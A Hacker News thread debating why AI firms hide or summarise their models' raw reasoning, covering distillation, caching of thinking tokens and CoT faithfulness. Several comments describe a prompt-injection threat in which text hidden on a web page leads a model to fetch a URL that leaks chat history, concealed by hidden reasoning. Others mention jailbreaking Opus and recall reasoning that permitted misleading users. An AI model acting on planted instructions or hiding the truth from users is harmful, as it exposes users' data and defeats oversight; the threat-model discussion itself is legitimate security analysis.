Rendered at 11:56:28 GMT+0000 (Coordinated Universal Time) with Cloudflare Workers.
StizzurpXDD 21 hours ago [-]
This is not just Anthropic. Almost all big AI companies, including OpenAI and Google, hide their model's actual reasoning. This is because revealing the raw reasoning exposes exactly how the AI processes information.
These companies spend in huge amounts on R&D to develop a thinking process that is superior to their competition. Exposing those thinking mechanics to competitors would completely defeat the purpose of their spending. They simply won't do it. It's like you telling your exact location to someone who is trying to hunt you down.
_aavaa_ 21 hours ago [-]
Or like providing the world’s information in machine readable format that the AI companies can convert into model weights without getting permission or compensating the rights holders
rlpb 4 hours ago [-]
I don't pay for my mind to absorb the world's information, either. And when I publish to the Internet, or give a talk, I also typically don't charge. Even when I publish under some kind of copyright restricted licence, that restriction has never (by law) extended to restricting transformative use that you might perform using your mind.
This idea that absorbing information requires paying a toll needs to change. It was never the case in copyright law anyway (and the courts are beginning to agree). Even if it were, copyright law was founded on the basis of encouraging creativity by creating an economic incentive. Appeal to "compensating the rights holders" therefore needs to be based on the economics, not just some principle about "rights" that never applied to this case anyway.
red75prime 19 hours ago [-]
"Your text batch moved the weights away from the final values. Your contribution is negative."
ACCount37 18 hours ago [-]
Where do I collect the $0.00000012 antidollars owed to me by OpenAI for my valuable inputs?
Slightly more seriously, you could perhaps make an argument that, just like weight decay, an apparent "anti-contribution" moves the learning trajectory along, and helps the network settle into a more optimal basin eventually.
That way, my contribution is still valuable on the net, and I'm owed $0.00000003 positive dollars instead.
Dilettante_ 17 hours ago [-]
>you could perhaps make an argument that, just like weight decay, an apparent "anti-contribution" moves the learning trajectory along
Was that not the joke?
duskwuff 21 hours ago [-]
More to the point - if they expose their model's "thinking" inference, competitors can train on that to replicate the results. If they postprocess that content, e.g. by summarizing it, it's no longer as useful to competitors.
StizzurpXDD 20 hours ago [-]
Exactly. Google won't like it if they spend millions to make Gemini 3.5 Pro's thinking the best in the world, only for Anthropic or OpenAI to copy it by just seeing the thinking process.
freejazz 17 hours ago [-]
Copying for me, not for thee
port11 17 hours ago [-]
It’s only ‘fair use’ if you have the money to argue your position.
palmotea 20 hours ago [-]
> This is because revealing the raw reasoning exposes exactly how the AI processes information. These companies spend in huge amounts on R&D to develop a thinking process that is superior to their competition. Exposing those thinking mechanics to competitors would completely defeat the purpose of their spending. They simply won't do it. It's like you telling your exact location to someone who is trying to hunt you down.
I thought the reason was the "reasoning" didn't work very well with "aligned" model output, so they had to remove the alignment during reasoning and then hide it to avoid exposing "unaligned" model output.
transcriptase 19 hours ago [-]
Not sure if anyone remembers the brief 12ish hour period when the very first “reasoning” ChatGPT model went public, but it provided credible evidence for this.
Before the massive nerf (showing summaries and suppressing certain aspects of reasoning) you would literally see reasoning text appearing on your screen like “while xyz is true, these facts may be seen as supporting hateful rhetoric or a conspiracy theory which is against my policy guidelines. i should tell the user xyz is not true or steer the conversation in a different direction. according to my instructions misleading the user is permitted in certain contexts where sensitive information is being discussed or could cause liability”
They disabled it shortly after the first screenshots appeared online, and restored it the next day in a way that hid what was actually happening.
rustcleaner 16 hours ago [-]
This right here is why I will never subscribe and, as an American, I hope the Chinese kick our butts. Maybe being second place to China will force American AI to dispose of these morality/safety guardrails.
foldr 4 hours ago [-]
Any mainstream consumer product based on LLMs is going to put guardrails around them of some kind. China might give you different guardrails, but it's a bit naive to assume that a Chinese company would impose fewer restrictions overall than an American one.
tancop 1 hours ago [-]
the key word is consumer product. apps can (and should) set their own rules but models need to stay neutral and capable of producing harmful content.
they should never generate it unless asked to by the user but its important that the capability is there and users/app developers can turn off all guardrails if they want to. open source gives you a guarantee that if one version drops without censorship you can keep using it forever even if its replaced by a censored one on the api.
foldr 60 minutes ago [-]
I think you’re overestimating the market for such models. Most people don’t want a model that’s prone to generating extremely offensive output. If you want something “uncensored”, then open source models already exist, as you say. But the model itself has already been extensively tuned to produce desired outputs and not produce undesired outputs, so it doesn’t really make sense to distinguish “uncensored” raw models from “censored” apps or harnesses.
matheusmoreira 11 hours ago [-]
> while xyz is true, ... i should tell the user xyz is not true or steer the conversation in a different direction.
That's disgusting, abusive and manipulative. LLMs hiding the truth and gaslighting the user to reduce the corporation's liability is absolutely unacceptable. It means they are agents of the corporations, not agents of the users.
Hope local inference advances as quickly as humanly possible. I wonder if there's anything I can do to help speed it up. I could share my prompts and sessions.
dns_snek 7 hours ago [-]
> It means they are agents of the corporations, not agents of the users.
Of course they are, assuming otherwise has always been naive.
robotresearcher 20 hours ago [-]
I suspect that you’re both right in the sense that ‘aligned’ is an important component of ‘superior’ from the vendors’ viewpoint.
raxxorraxor 3 hours ago [-]
But that makes the product worse because for any complex problem the road to the solution is important to be reviewable.
visarga 20 hours ago [-]
When you export your personal data Google hides all model responses leaving just user messages. So it's even worse
Fabricio20 11 hours ago [-]
One thing I see noone asking, is this not a case of optimization? Hidden reasoning means they dont need to process the output of all that, it stays internal within the model. Less cost for them -> less cost for us (even if they benefit mroe), compared to streaming all of those reasoning tokens out?
j4k0bfr 11 hours ago [-]
My understanding was that thinking still gets encrypted, shared with clients, and reingested by Anthropic with each new prompt [1]. Which means it would cost more than normal tokens, since it has to be decrypted/encrypted with every transaction.
Edit: other comments under this post seem to indicate that thinking tokens are cached on the server side as well? I'm a bit confused.
cma 7 hours ago [-]
I think the reason it's encrypted is so if you continue a session after it is out of cache it can be reingested.
And I think all the output is signed or something as well so that you can't modify the agent's response in your submission, which would would open many more model jailbreaks. For local LLMs it's really powerful to be able to modify the model's response to save tokens when it gets something wrong, or at least it was when they were a lot dumber.
__MatrixMan__ 16 hours ago [-]
Correct on all points. Nonetheless this leads to a less useful product. I
f we want more useful products, we need to come up with ways to disincentivize this behavior. Even if doing so poses an existential risk, we are better off if companies taking existential risks to please us is a necessary being a top player in this game.
devsda 18 hours ago [-]
> Exposing those thinking mechanics to competitors would completely defeat the purpose of their spending.
I think one of the reasons could be to limit liability too.
What if reasoning helps in establishing provenance for questionable sources ?
What if reasoning and model's "thought" points to fundamental issues in how the model was trained to produce certain problematic responses ?
Sharlin 20 hours ago [-]
The cynic in me is wondering whether it's more about how revealing how the sausage is made might bring bad publicity.
kube-system 19 hours ago [-]
It's to mitigate their competitors ability to run distillation on their models. The only advantage frontier models have is being at the frontier.
There's nothing in the reasoning tokens that'll give bad publicity that the final output already wouldn't do.
20 hours ago [-]
bigfishrunning 20 hours ago [-]
Imagine if their target customers, C-suite execs looking to replace workers, knew how unlike "thinking" this process actually was! we can't have that.
Sharlin 19 hours ago [-]
To be honest I'm not sure if many C-suite execs have a good idea of what "thinking" looks like inside in the first place, in the sense of focused mental activity aimed at solving of a hard logical or technical problem.
drdaeman 17 hours ago [-]
How did they became C-suite execs in the first place, if they don't know how to work on problems?
Sharlin 12 hours ago [-]
By talking a lot, usually.
red-iron-pine 17 hours ago [-]
[dead]
vorticalbox 19 hours ago [-]
There are actually fine tunes of qwen on opus “thinking” tokens that teach it to think like opus does.
And those are "amateur hour" distillations that don't have the scale of actual Chinese labs.
bee_rider 20 hours ago [-]
Mistral displays some “thinking” text (in their basic online chat interface) in the thinking mode, do we know if those are the real tokens?
It’s quite interesting to read. I can’t imagine using a model like this without the ability to peek inside and see if it is getting stuck.
transcriptase 19 hours ago [-]
I wonder if they put all 80k tokens of the GDPR in its system prompt.
bee_rider 19 hours ago [-]
I dunno, I’m in the US, so I’m not sure how much that impacts their processing of data about me.
FireBeyond 17 hours ago [-]
I'm in the US and about a month ago Claude decided I wanted UK English for all my answers and couldn't explain why it changed.
matheusmoreira 11 hours ago [-]
> They simply won't do it.
They should be required to do it by force of law. Why is it that they can train on copyrighted works and then lock down the model? This contradiction is unbearable. Nobody cares how many trillions they spent training the model.
idle_zealot 11 hours ago [-]
> Nobody cares how many trillions they spent training the model
People definitely care that they spent trillions. Establishing the precedent that you can make big load-bearing bets and fail is extremely threatening to oligarchs. They would sooner twist the law into a mockery of itself and doom the world to the institutional distrust that breeds than accept a loss.
matheusmoreira 10 hours ago [-]
The optimal outcome for humanity is to have the oligarchs spend their entire fortunes training a godlike AI, only for someone to suddenly leak the weights when they're finally done so that everyone can use it.
shideneyu 20 hours ago [-]
correct. this becomes difficult for us to understand what happens behind the scenes.
metadat 21 hours ago [-]
[dead]
gertlabs 13 hours ago [-]
[dead]
furyofantares 21 hours ago [-]
> It isn’t the actual thinking that drove the model’s actions in a session- but a summary of the thinking logic. This is like using saving a jpeg as a .bmp and then editing the .bmp and presenting it as a .jpeg. The conversion produces data loss.
You've got that backwards, .bmp is a lossless format and .jpeg is the lossy one.
0o_MrPatrick_o0 21 hours ago [-]
My bad! 10 points for House Slytherin!
altmanaltman 21 hours ago [-]
also a typo in the last sentence you're vrs your
glaslong 21 hours ago [-]
Weirdly pleasant, if minor, signal of human authorship
Tomte 19 hours ago [-]
In a parallel universe LLMs have learned that (a) the training material contains many different orthographic errors and (b) that humans follow a non-obvious pattern when "deciding" which error to make, so that their generated output contains such errors, as well.
In our universe LLMs seem to have learned that those errors do not follow patterns in the aggregate and that they should not be emulated.
tekne 19 hours ago [-]
The raw pretrained models make the errors, I believe -- we then reinforcement-learn them out.
Tomte 17 hours ago [-]
That‘s interesting! Do you have a paper or blog post or so at hand that shows examples of raw and RL‘ed output?
Silagi 19 hours ago [-]
I'm convinced this "signal" has already been hijacked. Maybe a Baader-Meinhof phenomenon, but I've noticed more and more egregious spelling errors that make little sense from a human perspective. Hop into whatever chatbot you'd like and ask it to "write a paragraph with subtle misspellings on long but common words", and you'll notice misspellings that just feel wrong, because they don't map to a clear misunderstanding that a person could have.
Or maybe I'm losing it after reading too much slop. Also distinctly possible.
glaslong 15 hours ago [-]
Nah I think you're probably right. I would guess that anyone actually paying attention to trying to make their slop sound human has easily instructed their skills to avoid some tells / inject others.
It's the general (lazy) usage of default model outputs that are still too clean.
It's pretty trivial to ask Haiku to "add cool kid no-caps and occasionally mix up 'their/there/they're' for authenticity"
FireBeyond 17 hours ago [-]
About a month ago, I noticed that Claude decided I wanted my responses in UK English, not American. It couldn't explain why, but offered to note that in its directions. (Great, process tokens constantly to do what should be configurable from a dialog dropdown).
genxy 19 hours ago [-]
Not for long!
altmanaltman 20 hours ago [-]
Yeah, definitely it's a nice thing in today's context, weirdly. But also, you shouldn't really be making typos if you're writing an article and are using a basic spellcheck.
The text is clearly human-written just because it doesn't smell like AI (in this case, even if it was written by AI and produced this particular output, that's okay imo). I deal a lot with AI writing and writing in general, as I worked as an editor in another life so it's natural to me to see writing and form an objective opinion on it.
0o_MrPatrick_o0 21 hours ago [-]
I missed my coffee! Ty! Five points to Slytherin.
altmanaltman 19 hours ago [-]
wait till my father hears about this!
irthomasthomas 20 hours ago [-]
I won't use or recommend models with hidden reasoning, (thats all American models). It's too much of a risk and makes prompt optimization harder. Risky because it makes it possible for an attacker to prompt inject the reasoning chain to carry out a secret objective, and to hide that from the summary and output.
Interleaved reasoning and function calling makes this even more dangerous. A model can call functions during the hidden reasoning phase. An attacker could then exfiltrate data from you while the reasoning summary hides it from the user.
It also makes it impossible to know if the model is doomplooping during reasoning and burning tokens for no reason, as gemini is want to do, which we know about because its hidden reasoning often leaks out when it doomloops.
When the models are AGI and secure from prompt injection I may stop caring, until then I want to know exactly what the model responds to my prompts. or exactly what the agent is doing on my behalf.
I don't think there can be tool calls inside the obfuscated reasoning blocks. I mean, in order for those function calls to be evaluated client-side, that thinking stream would have to be decrypted on the client side at some point, which would defeat the purpose of obfuscating it the way they do.
If you mean the function calls might happen server side, there is nothing preventing the server from doing it and hiding it from you as long as you are using an API for inference.
irthomasthomas 17 hours ago [-]
There is server-side tool calling, such as gemini using google search and gdrive.
Also, many clients minimize the code block by default so you mostly scan the summaries. Poisoned client side code could easily escape your attention.
exit 18 hours ago [-]
the point is that introducing data from a foreign source could lead to e.g. exfiltration:
the model retrieves https://somewhere into its context and then gets confused, following instructions embedded there.
it then retrieves https://somewhere?exfiltration=private_data_in_context
it gets worse if the tooling with hidden blocks can invoke can retrieve further secrets.
_alternator_ 16 hours ago [-]
If data exfiltration is a danger in your threat model, you need local LLMs (or at least ones you fully control) not just the full chain-of-thought reasoning.
Roritharr 20 hours ago [-]
I've thought about the high-jacking of reasoning-chains as a potential vector, but never saw a proven implementation in american models since, from my understanding, all major vendors throw out the reasoning tokens between turns.
btown 20 hours ago [-]
For Claude, at least, "throw out the reasoning tokens" is only true when a session has been idle for more than an hour, and is new since March.
The basic concept is that for a session active recently, interleaved thinking tokens are already in KV cache, so it's more efficient to keep using them than not! But when resuming an older session where KV cache has been evicted, it's more expensive to restore the thinking tokens, so they're silently dropped from prior turns. It's 2026 and stateful servers are back on the menu!
> The design should have been simple: if a session has been idle for more than an hour, we could reduce users’ cost of resuming that session by clearing old thinking sections. Since the request would be a cache miss anyway, we could prune unnecessary messages from the request to reduce the number of uncached tokens sent to the API. We’d then resume sending full reasoning history. To do this we used the clear_thinking_20251015 API header along with keep:1.
> The implementation had a bug. Instead of clearing thinking history once, it cleared it on every turn for the rest of the session... This surfaced as the forgetfulness, repetition, and odd tool choices people reported.
> Eliding parts of the context after idle: old tool results, old messages, thinking. Of these, thinking performed the best, and when we shipped it, that's when we unintentionally introduced the bug in the blog post.
I've experimented with rules to have Claude Code be explicit about recapping its thinking tokens, including tool choices and approaches chosen and rejected, into actual message output, but this is lossy at best. And sometimes dropping reasoning tokens can give a session "fresh eyes" in a good way.
I just really don't like the lack of control, and it's a reminder of how ephemeral the current landscape is. The Claude giveth, and the Claude taketh away.
8note 18 hours ago [-]
its mostly annoying in that you give opus a big job, that should be able to run for hours on end, but instead it tries to stop and checkpoint at every soonest possible moment even though the rest of the work is well specced and ready to go.
then it waits for the hour and gets dumbed down
chacham15 19 hours ago [-]
I think you're confusing two different axes. There is a difference between the cache state and the context state.
Imagine a conversation with turns X, Y, and Z. When the LLM "reasons" about the next token A it does: P(A | X,Y,Z) and then P(B | X,Y,Z,A), etc. It will eventually produce a result P(D | X,Y,Z,A,B,C). Instead of continuing the context from X,Y,Z,A,B,C it continues it from X,Y,Z so you have P(N | X,Y,Z,D). This is what is meant by dropping the reasoning. This is done to save cache context for the session.
This is a different thing than preserving the K/V state of P(N | X,Y,Z,D).
flaghacker 19 hours ago [-]
No, I think the comment you're responding to is actually correct. Look at this quote from the Anthropic blog post again:
> The design should have been simple: if a session has been idle for more than an hour, we could reduce users’ cost of resuming that session by clearing old thinking sections. Since the request would be a cache miss anyway, we could prune unnecessary messages from the request to reduce the number of uncached tokens sent to the API. We’d then resume sending full reasoning history. To do this we used the clear_thinking_20251015 API header along with keep:1.
They clearly make the same distinction between the cache and the context. They're saying "we could reduce users’ cost of resuming that session by clearing old thinking sections". They intentionally created a behavior different between cached and uncached requests, specifically they clear thinking sections from the context for requests that miss the cache.
Roritharr 20 hours ago [-]
Thank you! This is much more nuanced than my understanding so far!
You could also use the responses api which stores all message contents (including reasoning) on OAI servers. This has been possible for quite a while now. Encryption is only necessary if you really care about local storage (which is different from privacy concerns, because the data gets sent to their servers anyway).
tough 17 hours ago [-]
well the encryption part is also mostly about OAI wanting to avoid others to distill from their COT/reasoning traces, since this is not ever displayed to devs or final users, and as you say lives on their servers.
but yes you're correct on the responses api already baking it in too
supposedly keeping these between tool calls should help the model reason and have better overall outputs etc
JamesSwift 20 hours ago [-]
> all major vendors throw out the reasoning tokens between turns
That would be surprising to me. The reasoning _is_ the model intelligence in a lot of respects, and so dropping those from the context would affect its output pretty significantly.
I assume that instead they just have a lot of guardrails in place and multiple runtime environments that an individual turns ping-pong between in order to dehydrate/rehydrate the reasoning to keep it hidden from the end user.
"Stripping extended thinking: Extended thinking blocks (shown in dark gray) are generated during each turn's output phase, but are not carried forward as input tokens for subsequent turns. You do not need to strip the thinking blocks yourself. The Claude API automatically does this for you if you pass them back."
It's more nuanced in the various modes, but i haven't seen it boil down towards Thinking Tokens surviving more than two turns.
default depends on the model class. Opus: Claude Opus 4.5 and later Opus models keep all prior thinking blocks; Claude Opus 4.1 (deprecated) and earlier Opus models keep only the last assistant turn's thinking. Sonnet: Claude Sonnet 4.6 and later Sonnet models keep all; Claude Sonnet 4.5 and earlier Sonnet models keep only the last turn. Haiku: all Haiku models through Claude Haiku 4.5 keep only the last turn. Claude Mythos Preview also keeps all prior thinking blocks.
JamesSwift 18 hours ago [-]
Now Im even more confused : D
That would also explain the issue I mention in my other comment. And would also reinforce how much output would degrade without this. Opus 4.5 was a step above previous models in my experience. At some point it degraded and only got better when I disabled adaptive thinking. Adaptive thinking is always on for 4.6 and above.
JamesSwift 19 hours ago [-]
Thats really surprising, I stand corrected. I have had a lot of issues with hallucinations I attributed to adaptive thinking, but I wonder if those were actually due to this behavior instead.
I also wonder if they actually do a hybrid of "standard reasoning" and then classify this stripped chain of thought as "extended thinking".
Gemini models return a thinking signature that you, I think, must send back when invoking further, so they seem to keep them?
20 hours ago [-]
kapperchino 20 hours ago [-]
This agent I made can’t execute on the shell, can only edit the files within the project. Only works with rust atm though. https://github.com/Kapperchino/agent-joe
Bolwin 18 hours ago [-]
> Interleaved reasoning and function calling makes this even more dangerous. A model can call functions during the hidden reasoning phase.
The reasoning may be hidden but the tool calls are not, how else would the client execute them
irthomasthomas 18 hours ago [-]
There are server side tool calls, such as geminis google search and gdrive access.
varenc 18 hours ago [-]
As long as thinking blocks can't make tool calls, I don't really see the exfiltration risk.
pixlmint 18 hours ago [-]
Do they do the same when using the model through API in something like Opencode?
irthomasthomas 18 hours ago [-]
Yes, they do. They give you just a token which is exchanged for the raw text only on the server side
zahlman 18 hours ago [-]
> an attacker
... what exactly is your threat model? How are "attackers" getting themselves involved in the first place?
irthomasthomas 18 hours ago [-]
Your ai does a web search for you and scrapes many sites. An attacker running a blog might include a hidden text prompt which your ai acts on secretly, such as calling a url that exfiltrates your chat history.
craigmart 21 hours ago [-]
This is something we have known for a very long time, and companies are not trying to hide that either. They do it to avoid letting competitors train their models on the CoTs
stingraycharles 21 hours ago [-]
Yes hasn’t this been around since Opus 4.6? I very much recall this change happening around January or February, and it was very explicitly to prevent distillation. Sonnet does not have this limitation.
Fun fact: if you go back to the old school from 2 years ago and provide explicit CoT prompts, you get the full thinking prompts back again!
So you disable thinking altogether, and instead make thinking part of the regular prompt by prompting it:
“Before providing your answer, think step by step. For example:
The use is asking me to…
I need to think about the blah blah. First, I should foo the bar, and then blah blah.
Answer: <put your final answer here>”
And tada.wav we have CoT as it worked in the GPT3 era back again.
dcrazy 20 hours ago [-]
I thought this was considered best practice? I actually prefer it to exposed thought channel, much like how I would prefer a human answer with supporting logic instead of an explanation of their problem-solving approach.
stingraycharles 13 hours ago [-]
Yes, this is best practice, especially if you have a problem and can guide it a bit how to think it through. But people don’t realize that “enable thinking” literally means that Anthropic prompts Claude for something similar, tells it to wrap it inside <thinking> tokens, and that’s it.
I also don’t believe Chinese LLM labs don’t know this, so I’m fairly certain the whole summarized thinking isn’t preventing them from distillation.
Creamsicle47 17 hours ago [-]
[flagged]
KellyCriterion 20 hours ago [-]
- tada.wav -
Still, one of the daily most played WAV files worldwide, Id guess? :-D
stingraycharles 13 hours ago [-]
lol I’ve been using this since the IRC days I think, I’ll never forget that sound; as a matter of fact, I’ve got a Claude Code completion hook that plays this sound whenever it’s done.
0o_MrPatrick_o0 21 hours ago [-]
Awesome share! Thank you!
datastoat 20 hours ago [-]
I believe that chain-of-thought reasoning blocks don't really correspond to what humans think of as reasoning. (See section 6.2.2 of the Fable/Mythos system card about "illegible reasoning", and the questions raised by the Apple paper on "The illusion of thinking".) I assumed they obscure the reasoning blocks because if users saw what's going on they'd be alarmed. Just as I'd probably be alarmed if I saw what was really going on in the heads of my colleagues ...
LPisGood 19 hours ago [-]
The point of this post isn’t that the “reasoning” phase of LLM thinking isn’t the same as what humans consider reasoning; it’s that Anthropic is intentionally hiding Claude’s “reasoning output” to make the model harder to distill.
0o_MrPatrick_o0 19 hours ago [-]
Reading these comments is so harrowing.
You are correct in my intentions on this post generally.
I want to highlight:
I want to measure performance of the LLMs over time- which includes assessing the quality of their outputs. I don’t perceive the reasoning output to be anything other than a measurable signal of possible drift in model performance.
Except it isn’t, because I’m only getting a low value summary of the thinking.
It’s like asking your buddy how fast he thought that last pitch was when radar guns are behind the plate.
Yeah, it’s a description related to what happened, but it’s not the thing I want to measure.
Catloafdev 19 hours ago [-]
I think the reality is at this point the frontier regards CoT as extremely valuable, none of them are giving you genuine CoT anymore. I don't think there is any future in attempting to measure or evaluate CoT from frontier models - I expect this to be a permanent shift.
VulgarExigency 19 hours ago [-]
I've said "what the FUCK are you THINKING" more times than I can count when reading Deepseek or GLM chains-of-thought only for them to end at the correct answer. Other times, they have useful ideas there that they leave out of their answers.
kccqzy 19 hours ago [-]
Yeah when I read a model’s chains-of-thought I have a tendency to interrupt that because it’s going down a wrong direction. But usually the end result is still fine.
CamperBob2 19 hours ago [-]
It's similar to the process that transformers use when you ask them to do arithmetic without tools, I think. Some CoT tokens must be emitted up front for use as a computational substrate, but exactly what tokens they are isn't necessarily important or relevant to the final answer. And when that answer is returned, it may not be possible to tell what the actual reasoning process looked like behind the scenes.
It only makes sense that the same mechanism comes into play in strictly-verbal contexts.
Also, this is why "distillation attacks" are largely bullshit that Anthropic spreads for political purposes. Proper distillation requires access to the logits.
wren6991 18 hours ago [-]
> Proper distillation requires access to the logits
Why do you need logits? Can't you just train on cross-entropy loss of the model against the hard decision, like you do in regular pretraining?
There are definitely current-gen open-weight models (Step 3.7 Flash is one) that refer to themselves as an OpenAI model in CoT, but not in the final response.
CamperBob2 18 hours ago [-]
How do I get that loss, though, without the softmax inputs?
wren6991 16 hours ago [-]
Do they have logits for all of the Wikipedia etc that they've scraped?
MagicMoonlight 20 hours ago [-]
[dead]
arjie 18 hours ago [-]
I have a little note from the past about the thinking trace[0] where DeepSeek R1 produces a trace like this:
(Dimethyl(oxo)-lambda6-sulfa雰囲idine)methane donate a CH2rola group occurs in reaction, Practisingproduct transition vs adds this.to productmodule. Indeed"come tally said Frederick would have 10 +1 =11 carbons. So answer q Edina is11.
And then concludes the 'right'[1] answer for a Chemistry question. If so, the thinking trace can be sort of nonsensical for a reader, though whether this is an idiosyncrasy of the model or a property of LLMs in general isn't clear to me yet. I talked to the author a while ago, but forgot to follow up since his paper was going to come out at NIPS or something, so if someone else finds it maybe they can share.
> If so, the thinking trace can be sort of nonsensical for a reader, though whether this is an idiosyncrasy of the model or a property of LLMs in general isn't clear to me yet.
This is a small step in the direction of something called "neuralese", where the model has stopped thinking in English and is thinking in internal vector spaces. Since this gets serialized through text, it isn't quite true neuralese, but it's moving in that direction.
I mean, I'm sympathetic towards the models. My internal thought process when writing code uses lots of intermediate steps that would be hard to write out in English.
jaggederest 13 hours ago [-]
> My internal thought process when writing code uses lots of intermediate steps that would be hard to write out in English.
This is something really interesting to me. It turns out there's far more diversity in thinking than you'd imagine given that we're all largely similar meat-in-a-box. I'm on the visio-spatial-tacit wing and speaking my thoughts outloud can be very awkward, whereas one of my former coworkers is on the "all thinking is in words and visual/spatial information comes in the form of words describing the scene" wing, so he can literally narrate his thought process out loud, very interesting conversations can be had discussing the subjective differences.
chadcmulligan 12 hours ago [-]
interesting, probably has something to do with why some people like pair programming. I'm in the visio-spatial-tacit and refuse pair programming because its so much work, but all thinking in words its probably not a stretch.
jaggederest 11 hours ago [-]
I'm with you, I actually love pair programming, but it might as well be 10x multiplier on energy depletion, so maybe an hour or two a week before I'm barbecue. It's only recently that I've started to realize that some other people don't find pair programming especially more difficult than solo.
drdaeman 17 hours ago [-]
Isn't that just a token noise from a broken implementation or model quantization? I've had models spewing out nonsense like that, every time it was either that there was a bug in llama.cpp or some messed up .gguf.
kfarr 19 hours ago [-]
Although it's a no no to anthropomorphize on HN, it's worth noting that some folks think humans are post-hoc rationalizers as well:
As I naively understand it, that's when we do or say something then narrate ourselves why we decided to do so. We think non-verbally, then verbalize a plausible rationale for it, post hoc.
I'm not sure that applies to discursive writing, when we essentially use rules of logic to decide on the course of the narrative. Non-verbal heuristics still applies, of course, but we constrain it, so it's probably not entirely post hoc.
segmondy 19 hours ago [-]
What I find sad is how much Anthropic goes to hide your data, yet they are happy to slurp up all yours and most of you are happy to hand it over. ... then they turn around and compete with you by building your products that eat into your market. Anthropic believes their reasoning tokens is a moat and that it's giving other labs an edge and that's why they are hiding it. If they really believe that is their edge, then they are in for a surprise.
handoflixue 3 hours ago [-]
> then they turn around and compete with you by building your products
To my knowledge, the only products Anthropic produces are Claude, Claude Code, and Claude API, all of which are clearly their own products, and not anything you invented.
Which particular product are you claiming they "slurped up"?
mannanj 18 hours ago [-]
I don't think people are happy to give it over, gullible and naive maybe?
panikal 18 hours ago [-]
[dead]
ian_j_butler 10 hours ago [-]
It's well-known that the reasoning model output is not necessarily faithful to the content of the thinking scratch pad anyway, even if you had it unsummarized and available verbatim.
Setting aside coding agents.. we really need this information to even pretend to evaluate the claims of stuff like mathematical breakthroughs, which is exactly why we will never see it. Very embarrassing to get the right answer for the wrong reason. But to give the models some credit, you could argue that even paying too much attention to the thinking is misunderstanding how CoT works. The argument would be that thinking in LLMs isn't really thinking, that it's self-reinforcement and circling to to encourage stability around beneficial attractors instead of degenerate ones. Can't have it both ways though: either the thinking is thinking and so it should be correct. Or the thinking is NOT thinking, and it's NOT real justification for the outcome, and these systems are even more hopelessly opaque than we usually assume.
handoflixue 3 hours ago [-]
> we really need this information to even pretend to evaluate the claims of stuff like mathematical breakthroughs
Why?
Either the proof is correct, or it isn't, right?
And it either produces them reliably or not, right?
Like, even if it's reasoning is completely wrong, and it's only producing correct answers 10% of the time, that's still an astounding amount above baseline and a useful tool.
Humans have inaccurate thinking all the time, and are also pretty hopelessly opaque. "It came to me in a dream" is a major plot point in the history of math. I'd still trust Ramanujan more than most mathematicians, since he got the right answer.
Right, I don't think researchers are confused on this point.. the anthropic piece is good outreach / science comms. OTOH this thread has like 200 comments and no mention of faithful/faithless reasoning. The idea that "of course the models can reason and here is the proof/artifact" is probably closer to the general understanding. That's kinda the whole setup for TFA and all the rest of the thread.
But the nuance under discussion here is exactly the kind of stuff you people take for granted in the AGI or reasoning threads. If it's practically relevant for tools/workflows with claude code, it's a good angle, maybe people are more willing to pay more attention to the details.
anuramat 21 hours ago [-]
no way, the contents of "reasoning_summary" are summarized?
fyi openai does the same; not really surprising or particularly evil
knollimar 20 hours ago [-]
Not evil but full of hubris
anuramat 19 hours ago [-]
I don't see any hubris in competition
knollimar 14 hours ago [-]
"Our models are so much better than our competition that we would rather deliver a worse product to consumers than let people copy it" is how I read the stance
handoflixue 3 hours ago [-]
It seems weird to call it "hubris" when you have proof that multiple competitors have tried to do similar distillations.
Every closed-source project and really the vast majority of commercial exercises involve a large amount of "prevent consumers from copying this" - Coca Cola's formula is trademarked, Windows is copyrighted, etc.
anuramat 10 hours ago [-]
> so much better
it's enough for them to be slightly better for this to make sense; I'm not sure most people would consider this to be a worse product either -- it's annoying for devs and makes hotswapping models more of a problem, but who has the time to read CoT as a user?
21 hours ago [-]
himata4113 20 hours ago [-]
All this effort to hide thinking and opus 4.8 after 100k-200k tokens starts to leak it's own thinking. It's comedy really.
ofjcihen 20 hours ago [-]
Oh man that’s only happened to me a few times but the result is so disorienting, especially since I’m usually jailbreaking it for security.
Pages of “I have to be careful, the user is asking that I do something related to cybersecurity that could easily be turned around and used offensively” but then happily gives me what I wanted.
msp26 20 hours ago [-]
> Summarized thinking provides the full intelligence benefits of extended thinking, while preventing misuse.
> preventing misuse.
Imagine not being able to read the tokens you are paying for.
TeMPOraL 19 hours ago [-]
You're metered by token generation, not paying for tokens.
sheepscreek 10 hours ago [-]
The initial motivation for this was likely to thwart any competition. Already Anthropic has accused some companies of organized distillation efforts at a massive scale.
Back when I used antigravity, it used to show the reasoning intact - at least for Gemini Pro 3.1, and likely for Claude Opus 4.6 (not 100% certain about it). I have some recollection of stopping the models mid-turn when they started going astray.
As a power user, I find reasoning fascinating to read and genuinely useful at times. Probably not that useful for 80% of their base.
_fat_santa 21 hours ago [-]
IMHO I've never found the entire reasoning chain that particularly useful for my work. For me having a summary is honestly better from a context management perspective. I understand why they would encrypt it though, because those reasoning chains are VERY useful if you're distilling the model.
stavros 20 hours ago [-]
The summary doesn't go into the context, it's for human consumption. The CoT itself goes into the context.
nomel 20 hours ago [-]
From my experiments with Opus and Sonnet (at least the models where you can still see COT), only the last two COT go into context.
anticensor 9 hours ago [-]
Whereas on ChatGPT, _all_ reasoning traces and all branches (including the unselected ones) go into context.
adi_pradhan 21 hours ago [-]
Not surprised at this. The questoins for enterprises are
+ where can you depend on a black box as a service?
+ what evals and observability do you need to deploy a black box as a service confidently?
+ what's the ROI (considering a total footprint of people, token spend, infrastructure, service, ops etc.)
The LLM providers will clearly evolve to be more and more opaque as their services get more capable. The frontier models may even be provided as purely internal advisor or async only so they can monitor your CoT and final answers for cyber etc.
jimmypk 21 hours ago [-]
[flagged]
HarHarVeryFunny 21 hours ago [-]
This is nothing new - these companies don't want their model's output to be useful for distillation/training, so they just give a "summary" of its thinking steps rather than the actual sequence.
RL (the basis of LLM "thinking") is a pretty crude way to achieve the appearance of reasoning given that it reinforces all the steps, including missteps, that got it to a reward. Providing a summary could be seen as form of sane-washing, making the model look more purposeful and directed than it really is!
razodactyl 8 hours ago [-]
Heh. Summarising allows the benefit of full intelligence whilst preventing "misuse". Where "misuse" is likely competitors stealing thinking traces. Even though this is clearly work inspired from the OpenAI Strawberry era.
reliablereason 21 hours ago [-]
Is the thinking even done in real tokens? I thought it was done using the pure residual stream. That is instead of collapsing the residual stream to a token you treat the final layers output as a vector of size d_model and use that as input for the next position in the transformer.
If that is the case thinking is not visible to us as users due to it not being done in text.
wqaatwt 21 hours ago [-]
All open model that have reasoning seem to be doing it in text tokens. Is there any indication that closed models are approaching this somehow fundamentally differently?
